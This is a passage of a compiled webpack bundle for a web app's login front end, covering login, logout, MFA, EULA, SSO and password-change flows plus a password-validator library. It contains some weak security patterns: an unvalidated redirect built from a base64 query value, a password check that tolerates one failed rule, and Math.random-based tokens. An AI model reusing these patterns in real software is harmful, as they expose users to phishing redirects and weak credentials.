  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["INITIALIZE"], __WEBPACK_IMPORTED_MODULE_12__action_types_js__["FETCH_SERVER_SESSION_TIMEOUT_SUCCESS"]).switchMap(function () {
    var state = store.getState();
    return getUserActivityStream({
      warningTime: __WEBPACK_IMPORTED_MODULE_10__getters_js__["warningTime"](state),
      logoutTime: __WEBPACK_IMPORTED_MODULE_10__getters_js__["logoutTime"](state)
    });
  }).do(function (x) {
    return debug('JUST SAW user activity', x);
  });
};

/* TODO: after refactoring the app intialization actions in App.js
 * into epics this epic could listen for success for all of them: */
var appRehydration = function appRehydration(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6_redux_persist_immutable_constants__["REHYDRATE"]).mapTo({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["INITIALIZE_SUCCESS"] });
};

var failedActionRe = /(.+)_FAILURE$/;
var isFailedAction = function isFailedAction(x) {
  return failedActionRe.test(x);
};

var alertsEpic = function alertsEpic(action$) {
  return action$.filter(function (action) {
    return action.error || isFailedAction(action);
  }).do(function (action) {
    return errorDebugger('exception:', action.type, action.payload);
  }).ignoreElements();
};

var clearLoginStatusMessageEpic = function clearLoginStatusMessageEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_CLEAR_STATUS_MESSAGE"]).delay(3000).debounceTime(500).map(function () {
    return { type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS"] };
  });
};

var loginEpic = function loginEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax,
      localStorage = _ref6.localStorage;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN"]).switchMap(function (action) {
    return ajax.post(__WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT"], Object(__WEBPACK_IMPORTED_MODULE_5_querystring__["stringify"])(action.payload), {}, { timeout: __WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_TIMEOUT_MS"] }).do(function () {
      localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["STORED_USERNAME_LOCALSTORAGE_KEY"], action.payload.username);
      return action.payload.cfa ? localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"], action.payload.cfa) : localStorage.removeItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"]);
    }).mergeMap(function (_ref7) {
      var response = _ref7.response;

      if (action.payload.cfa) {
        // cfa - Coming From App
        return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT_TO_EXTERNAL_APP"], // Upon success will take you back to the app from which you came
          payload: _extends({ rta: action.payload.cfa }, response) // rta - Return To App
        });
      } else {
        return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"], // Login Redirect refers to an internal route
          payload: response
        });
      }
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_FAILURE"],
        payload: err,
        error: true
      });
    });
  });
};

var eulaRedirectEpic = function eulaRedirectEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"]).pluck('payload', 'state').filter(function (state) {
    return state === 'REQUIRES_EULA';
  }).do(function (action) {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/auth/eula'));
  }).ignoreElements();
};

var mfaRedirectEpic = function mfaRedirectEpic(action$, store, _ref9) {
  var ajax = _ref9.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"]).pluck('payload', 'state').filter(function (state) {
    return state === 'REQUIRES_MFA';
  }).do(function (action) {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/auth/mfa'));
  }).ignoreElements();
};

var authenticatedRedirectEpic = function authenticatedRedirectEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax,
      localStorage = _ref10.localStorage;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"]).pluck('payload', 'state').filter(function (state) {
    return state === 'AUTHENTICATED';
  }).do(function (action) {
    return localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["IS_LOGGED_IN_LOCALSTORAGE_KEY"], true);
  }).do(function (action) {
    var intendedPath = __WEBPACK_IMPORTED_MODULE_10__getters_js__["intendedPath"](store.getState());
    if (intendedPath.match(/^\/(auth|$)/)) {
      store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/'));
    } else {
      store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"](intendedPath));
    }
  }).map(function () {
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_SUCCESS"]
    };
  });
};

// Subject to change, currently want to a totally separate epic for any external micro FE app uses
var authenticatedRedirectToExternalAppEpic = function authenticatedRedirectToExternalAppEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT_TO_EXTERNAL_APP"]).pluck('payload').filter(function (payload) {
    return payload.state === 'AUTHENTICATED';
  }).do(function (payload) {
    // TODO Formalize this flow
    var returnToAppUrl = atob(payload.rta);
    location.href = returnToAppUrl.toString();
  }).map(function () {
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_SUCCESS"]
    };
  });
};
var logoutEpic = function logoutEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax,
      localStorage = _ref11.localStorage;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT"]).do(function (action) {
    return action.payload && action.payload.cfa ? localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"], action.payload.cfa) : localStorage.removeItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"]);
  }).mergeMap(function (action) {
    return ajax.post(__WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGOUT_ENDPOINT"], action.payload, {}, { timeout: 5000 });
  }).mergeMap(function (_ref12) {
    var response = _ref12.response;
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT_SUCCESS"],
      payload: response
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT_FAILURE"],
      payload: err,
      error: true
    });
  }).finally()
  // Even if the logout api request fails, we should still
  // Invalidate the session in the browser and redirect to login.
  .do(function () {
    var comingFromApp = localStorage.getItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"]);

    localStorage.removeItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["STORED_USERNAME_LOCALSTORAGE_KEY"]);
    localStorage.removeItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["IS_LOGGED_IN_LOCALSTORAGE_KEY"]);
    localStorage.removeItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["COMING_FROM_APP"]);

    __WEBPACK_IMPORTED_MODULE_13_js_cookie___default.a.remove('XSRF-TOKEN', { domain: '.station.trustar.co' });
    __WEBPACK_IMPORTED_MODULE_13_js_cookie___default.a.remove('XSRF-TOKEN', { domain: 'station.trustar.co' });
    __WEBPACK_IMPORTED_MODULE_13_js_cookie___default.a.remove('XSRF-TOKEN');

    if (window.location.pathname !== __WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT_AUTHPATH"]) {
      // If the user clicked logout from one of our microservices, after logout append their app address so they can return there. TBD If this is good UX
      var loginWithPossibleAppLink = comingFromApp ? __WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT_AUTHPATH"] + '?' + Object(__WEBPACK_IMPORTED_MODULE_5_querystring__["stringify"])({ cfa: comingFromApp }) : __WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT_AUTHPATH"];

      window.location.replace(loginWithPossibleAppLink);
    }
  });
};

var acceptTermsEpic = function acceptTermsEpic(action$, store, _ref13) {
  var ajax = _ref13.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["ACCEPT_TERMS"]).mergeMap(function (action) {
    return ajax.post(__WEBPACK_IMPORTED_MODULE_11__constants_js__["SIGN_EULA_ENDPOINT"]);
  }, function (action, response) {
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"],
      payload: {
        state: 'AUTHENTICATED'
      }
    };
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["ACCEPT_TERMS_FAILURE"],
      payload: err,
      error: true
    });
  });
};

var createPasswordUpdateCredentialsEpic = function createPasswordUpdateCredentialsEpic(action$, store, _ref14) {
  var ajax = _ref14.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_CREDENTIALS_UPDATE"]).debounceTime(200).map(function (action) {
    var isValid = Object(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_util__["b" /* validatePassword */])(action.payload);
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_VALIDATE"],
      payload: isValid
    };
  });
};

var changePasswordEpic = function changePasswordEpic(action$, store, _ref15) {
  var ajax = _ref15.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD"]).mergeMap(function (action) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_11__constants_js__["CHANGE_PASSWORD_ENDPOINT"], action.payload);
  }).map(function (_ref16) {
    var response = _ref16.response;
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_SUCCESS"],
      payload: response
    };
  }).do(function () {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/auth/logout'));
  }).catch(function (err) {
    var type = __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_FAILURE"];
    if (err.status === 404) {
      type = __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_FAILURE_BAD_LINK"];
    } else if (err.status === 400) {
      type = __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN"];
    }
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: type,
      payload: err,
      error: true
    }).do(function () {
      return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/auth/login'));
    });
  });
};

var mfaVerifyResponseEpic = function mfaVerifyResponseEpic(action$, store, _ref17) {
  var ajax = _ref17.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["MFA_VERIFY_RESPONSE"]).mergeMap(function (action) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_11__constants_js__["MFA_VERIFY_RESPONSE_ENDPOINT"], action.payload);
  }).map(function (_ref18) {
    var response = _ref18.response;
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGIN_REDIRECT"],
      payload: {
        state: 'AUTHENTICATED'
      }
    };
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["MFA_VERIFY_RESPONSE_FAILURE"],
      payload: err,
      error: true
    });
  });
};

var mfaVerifyResponseFailureEpic = function mfaVerifyResponseFailureEpic(action$, store, _ref19) {
  var ajax = _ref19.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["MFA_VERIFY_RESPONSE_FAILURE"]).do(function () {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"](__WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT_AUTHPATH"]));
  }).ignoreElements();
};

var forgotPasswordEpic = function forgotPasswordEpic(action$, store, _ref20) {
  var ajax = _ref20.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["FORGOT_PASSWORD"]).mergeMap(function (action) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_11__constants_js__["FORGOT_PASSWORD_ENDPOINT"], action.payload);
  }).map(function (_ref21) {
    var response = _ref21.response;
    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["FORGOT_PASSWORD_SUCCESS"],
      payload: response
    };
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["FORGOT_PASSWORD_FAILURE"],
      payload: err,
      error: true
    });
  }).finally().do(function () {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"]('/auth/login'));
  });
};

var declineTermsEpic = function declineTermsEpic(action$, store, _ref22) {
  var ajax = _ref22.ajax;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["DECLINE_TERMS"]).do(function () {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"](__WEBPACK_IMPORTED_MODULE_11__constants_js__["LOGIN_ENDPOINT_AUTHPATH"]));
  }).ignoreElements();
};

// If User goes directly to /auth/sso, go ahead and act like they are logged in.
// The /tools/session call will log them out if they haven't indeed come from SSO.
var didLoginViaSSOEpic = function didLoginViaSSOEpic(action$, store, _ref23) {
  var ajax = _ref23.ajax,
      localStorage = _ref23.localStorage;

  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["DID_LOGIN_VIA_SSO"]).do(function () {
    return localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["STORED_USERNAME_LOCALSTORAGE_KEY"], '');
  }).do(function () {
    return localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["IS_LOGGED_IN_LOCALSTORAGE_KEY"], true);
  }).do(function (action) {
    return store.dispatch(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__["replace"](action.payload));
  }).ignoreElements();
};

var setThemeFromPreferences = function setThemeFromPreferences(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["SET_THEME_FROM_PREFERENCES"]).pluck('payload').map(function (themeMode) {
    var theme = themeMode === __WEBPACK_IMPORTED_MODULE_9_trustar_2_0_themes_common_constants__["c" /* NO_THEME */] ? __WEBPACK_IMPORTED_MODULE_9_trustar_2_0_themes_common_constants__["b" /* LIGHT_THEME */] : themeMode.toLowerCase();

    return {
      type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["SET_OPTIONS"],
      payload: { theme: theme }
    };
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(alertsEpic, clearLoginStatusMessageEpic, confirmAliveEpic, userActivityEpic, sessionTimeoutEpic, keepAliveEpic, appRehydration, loginEpic, mfaRedirectEpic, eulaRedirectEpic, authenticatedRedirectEpic, logoutEpic, acceptTermsEpic, createPasswordUpdateCredentialsEpic, changePasswordEpic, mfaVerifyResponseEpic, mfaVerifyResponseFailureEpic, forgotPasswordEpic, declineTermsEpic, didLoginViaSSOEpic, authenticatedRedirectToExternalAppEpic, setThemeFromPreferences));

/***/ }),
/* 2894 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});

var _constants = __webpack_require__(262);

Object.keys(_constants).forEach(function (key) {
  if (key === "default" || key === "__esModule") return;
  Object.defineProperty(exports, key, {
    enumerable: true,
    get: function get() {
      return _constants[key];
    }
  });
});

/***/ }),
/* 2895 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return validatePassword; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_password_validator__ = __webpack_require__(2896);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_password_validator___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_password_validator__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var schema = new __WEBPACK_IMPORTED_MODULE_0_password_validator___default.a();

schema.is().min(12) // Minimum length 8
.is().max(100) // Maximum length 100
.has().uppercase() // Must have uppercase letters
.has().lowercase() // Must have lowercase letters
.has().digits() // Must have digits
.has().symbols(); // Must have special symbols

var validatePassword = function validatePassword(password) {
  var isValid = {
    all: true,
    min: true,
    max: true,
    uppercase: true,
    lowercase: true,
    digits: true,
    symbols: true
  };

  var ls = schema.validate(password, { list: true });

  if (ls.length === 0) {
    return isValid;
  } else {
    isValid.all = false;

    ls.forEach(function (d) {
      if (d === 'max') {
        isValid.max = false;
      } else if (d === 'min') {
        isValid.min = false;
      } else if (d === 'uppercase') {
        isValid.uppercase = false;
      } else if (d === 'lowercase') {
        isValid.lowercase = false;
      } else if (d === 'digits') {
        isValid.digits = false;
      } else if (d === 'symbols') {
        isValid.symbols = false;
      }
    });

    if (ls.length <= 1 && isValid.min && isValid.max) {
      isValid.all = true;
    }

    return isValid;
  }
};

/***/ }),
/* 2896 */
/***/ (function(module, exports, __webpack_require__) {

var lib = __webpack_require__(2897);
var error = __webpack_require__(1295).error;

/**
 * Validates that a number is a valid length (positive number)
 *
 * @private
 * @param {number} num - Number to validate
 */
function _validateLength(num) {
  if (!num || typeof num !== 'number' || num < 0) {
    throw new Error(error.length);
  }
}

/**
 * Tests a validation and return the result
 *
 * @private
 * @param {string} property - Property to validate
 * @return {boolean} Boolean value indicting the validity
 *           of the password against the property
 */
function _isPasswordValidFor(property) {
  return lib[property.method].apply(this, property.arguments);
}

/**
 * Registers the properties of a password-validation schema object
 *
 * @private
 * @param {string} func - Property name
 * @param {array} args - arguments for the func property
 */
function _register(func, args) {
  // Add property to the schema
  this.properties.push({ method: func, arguments: args });
  return this;
}

/**
 * Creates a password-validator schema
 *
 * @constructor
 */
function PasswordValidator() {
  // Initialize a schema with no properties defined
  this.properties = [];
}

/**
 * Method to validate the password against schema
 *
 * @param {string} pwd - password to valdiate
 * @param {object} options - optional options to configure validation
 * @param {boolean} [options.list] - asks for a list of validation
 *           failures instead of just true/false
 * @return {boolean|array} Boolean value indicting the validity
 *           of the password as per schema, if 'options.list'
 *           is not set. Otherwise, it returns an array of
 *           property names which failed validations
 */
PasswordValidator.prototype.validate = function (pwd, options) {
  // Checks if pwd is invalid
  if (typeof pwd !== 'string') {
    throw new Error(error.password);
  }

  // Sets password string
  this.password = pwd;

  // Sets that no inversion takes place by default
  this.positive = true;

  var _this = this;

  if (options && options.list === true) {
    return this.properties.reduce(function (errorList, property) {
      // Applies all validations defined in lib one by one
      if (!_isPasswordValidFor.call(_this, property)) {
        // If the validation for a property fails,
        // add it to the error list
        return errorList.concat(property.method);
      }
      return errorList;
    }, []);
  }

  // Returns the result of the validations
  return this.properties.every(function (property) {
    // Applies all validations defined in lib one by one
    return _isPasswordValidFor.call(_this, property);
  });
};

/**
 * Rule to invert the next applied rules.
 * All the rules applied after 'not' will have opposite effect,
 * until 'has' rule is applied
 */
PasswordValidator.prototype.not = function not() {
  return _register.call(this, 'not', arguments);
};

/**
 * Rule to invert the effects of 'not'
 * Apart from that, 'has' is also used
 * to make the api readable and chainable
 */
PasswordValidator.prototype.has = function has() {
  return _register.call(this, 'has', arguments);
};

/**
 * Rule to invert the effects of 'not'
 * Apart from that, 'is' is also used
 * to make the api readable and chainable
 */
PasswordValidator.prototype.is = function is() {
  return _register.call(this, 'is', arguments);
};

/**
 * Rule to specify a minimum length of the password
 *
 * @param {number} num - minimum length
 */
PasswordValidator.prototype.min = function min(num) {
  _validateLength(num);
  return _register.call(this, 'min', arguments);
};

/**
 * Rule to specify a maximum length of the password
 *
 * @param {number} num - maximum length
 */
PasswordValidator.prototype.max = function max(num) {
  _validateLength(num);
  return _register.call(this, 'max', arguments);
};

/**
 * Rule to mendate the presense of digits in the password
 */
PasswordValidator.prototype.digits = function digits() {
  return _register.call(this, 'digits', arguments);
};

/**
 * Rule to mendate the presense of letters in the password
 */
PasswordValidator.prototype.letters = function letters() {
  return _register.call(this, 'letters', arguments);
};

/**
 * Rule to mendate the presense of uppercase letters in the password
 */
PasswordValidator.prototype.uppercase = function uppercase() {
  return _register.call(this, 'uppercase', arguments);
};

/**
 * Rule to mendate the presense of lowercase letters in the password
 */
PasswordValidator.prototype.lowercase = function lowercase() {
  return _register.call(this, 'lowercase', arguments);
};

/**
 * Rule to mendate the presense of symbols in the password
 */
PasswordValidator.prototype.symbols = function symbols() {
  return _register.call(this, 'symbols', arguments);
};

/**
 * Rule to mendate the presense of space in the password
 * It can be used along with 'not' to not allow spaces
 * in the password
 */
PasswordValidator.prototype.spaces = function spaces() {
  return _register.call(this, 'spaces', arguments);
};

/**
 * Rule to whitelist words to be used as password
 *
 * @param {array} list - list of values allowed
 */
PasswordValidator.prototype.oneOf = function oneOf() {
  return _register.call(this, 'oneOf', arguments);
};

module.exports = PasswordValidator;


/***/ }),
/* 2897 */
/***/ (function(module, exports, __webpack_require__) {

/**
 * Generic method to test regex
 *
 * @private
 * @param {string} regex - regex to test
 *                           with password
 */
var regex = __webpack_require__(1295).regex;

function _process(regexp) {
  return new RegExp(regexp).test(this.password) === this.positive;
}

module.exports = {

  /**
   * Method to invert the next validations
   *
   * @param {RegExp} [symbol] - custom Regex which should not be present
   */
  not: function not(symbol) {
    this.positive = false;
    if (symbol) {
      return _process.call(this, symbol);
    }
    return true;
  },

  /**
   * Method to invert the effects of not()
   *
   * @param {RegExp} [symbol] - custom Regex which should be present
   */
  has: function has(symbol) {
    this.positive = true;
    if (symbol) {
      return _process.call(this, symbol);
    }
    return true;
  },

  /**
   * Method to invert the effects of not() and
   * to make the api readable and chainable
   *
   */
  is: function is() {
    this.positive = true;
    return true;
  },

  /**
   * Method to specify a minimum length
   *
   * @param {number} num - minimum length
   */
  min: function min(num) {
    return this.password.length >= num;
  },

  /**
   * Method to specify a maximum length
   *
   * @param {number} num - maximum length
   */
  max: function max(num) {
    return this.password.length <= num;
  },

  /**
   * Method to validate the presense of digits
   */
  digits: function digits() {
    return _process.call(this, regex.digits);
  },

  /**
   * Method to validate the presense of letters
   */
  letters: function letters() {
    return _process.call(this, regex.letters);
  },

  /**
   * Method to validate the presense of uppercase letters
   */
  uppercase: function uppercase() {
    return _process.call(this, regex.uppercase);
  },

  /**
   * Method to validate the presense of lowercase letters
   */
  lowercase: function lowercase() {
    return _process.call(this, regex.lowercase);
  },

  /**
   * Method to validate the presense of symbols
   */
  symbols: function symbols() {
    return _process.call(this, regex.symbols);
  },

  /**
   * Method to validate the presense of space
   */
  spaces: function spaces() {
    return _process.call(this, regex.spaces);
  },

  /**
   * Method to provide pre-defined values for password
   *
   * @param {array} list - list of values allowed
   */
  oneOf: function oneOf(list) {
    return list.indexOf(this.password) >= 0 === this.positive;
  }
};


/***/ }),
/* 2898 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return randomStringGenerator; });
/* unused harmony export hashedEmailGenerator */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_crypto__ = __webpack_require__(1232);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_crypto___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_crypto__);


/**
 * Generate a random string of either alpha or alphanumeric characters
 * @param length
 * @param format
 * @returns {string}
 */
var randomStringGenerator = function randomStringGenerator() {
  var length = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 40;
  var format = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'alpha';

  var alphaChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  var alphaNumericChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

  if (length > 100 || length < 1) {
    console.error('Length must be between 1 and 100 characters');
    return;
  }

  var str = '';
  for (var i = 0; i < length; i++) {
    if (format == 'alpha') {
      var char = alphaChars.charAt(Math.random() * alphaChars.length);
      str += char;
    } else if (format == 'alphanum') {
      var _char = alphaNumericChars.charAt(Math.random() * alphaNumericChars.length);
      str += _char;
    }
  }

  return str;
};

var hashedEmailGenerator = function hashedEmailGenerator(companyName) {
  var length = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 40;

  var hash = __WEBPACK_IMPORTED_MODULE_0_crypto___default.a.createHash('sha256');
  hash.update('' + Date.now());
  hash.update('' + companyName);

  return hash.digest('hex');
};

/***/ }),
/* 2899 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "alerts", function() { return alerts; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "alertList", function() { return alertList; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);





var alerts = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['alerts']);
var alertList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(alerts, function (alerts) {
  return alerts.toList();
});

/***/ }),
/* 2900 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Alert */
/* unused harmony export getKey */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(493);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };







var Alert = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: '',
  type: '',
  text: '',
  htmlMessage: null
});

/**
 * getKey returns a string value that is unique to any given object with both
 * text and type properties. We use this to ensure that alert sare unique
 * in terms of type and text combination.
 */
var getKey = function getKey(_ref) {
  var type = _ref.type,
      text = _ref.text;
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__["shasum"])(type + text);
};

/**
 * When adding a alert we don't want to allow duplicates. Duplicates are
 * defined as a alert with the same text AND type. Meaning you can add an
 * error alert with text 'hey' and a warning with text 'hey'. That's
 * fine, but we want alerts to be unique in terms of text/type
 * combination.
 *
 * For this purpose we has the concatenation of alert.type and
 * alert.text and use the resulting hashed value as they key for this
 * alert. See `getKey` for more info.
 *
 * NOTE: Although we call the key 'id', alerts are never persisted to the
 * server. They are in-memory only.
 *
 * NOTE: That when creating alerts a plain object is dispatched and
 * handled by the store. On the other hand, when deleting a alert we get
 * an immutable map since it has already be converted.
 */


/* harmony default export */ __webpack_exports__["a"] = (function () {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* ADD_ALERT */]:
      var id = getKey(payload);
      return state.set(id, Alert(_extends({ id: id }, payload)));
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* DELETE_ALERT */]:
      return state.delete(payload.get('id'));
    default:
      return state;
  }
});

/***/ }),
/* 2901 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(493);


// NOTE: Once we refactor the alert action to be an action creator we should
// import it directly instead of making our own.
// import { alert } from './actions.js';


/**
 * TODO: Currently the alert component is responsible for removing alerts after
 * a set amount of time. We could handle this in a more elegant way here once we
 * fully refactor.
 */

var alert = function alert(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* ADD_ALERT */],
    payload: payload
  };
};

var isAlert = function isAlert(x) {
  return x && typeof x.type === 'string' && typeof x.text === 'string';
};

var hasAlert = function hasAlert(action) {
  return !!action.meta && isAlert(action.meta.alert);
};

var alertsEpic = function alertsEpic(action$) {
  return action$.filter(hasAlert).map(function (x) {
    return alert(x.meta.alert);
  });
};

/* harmony default export */ __webpack_exports__["a"] = (alertsEpic);

/***/ }),
/* 2902 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export chatReducer */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
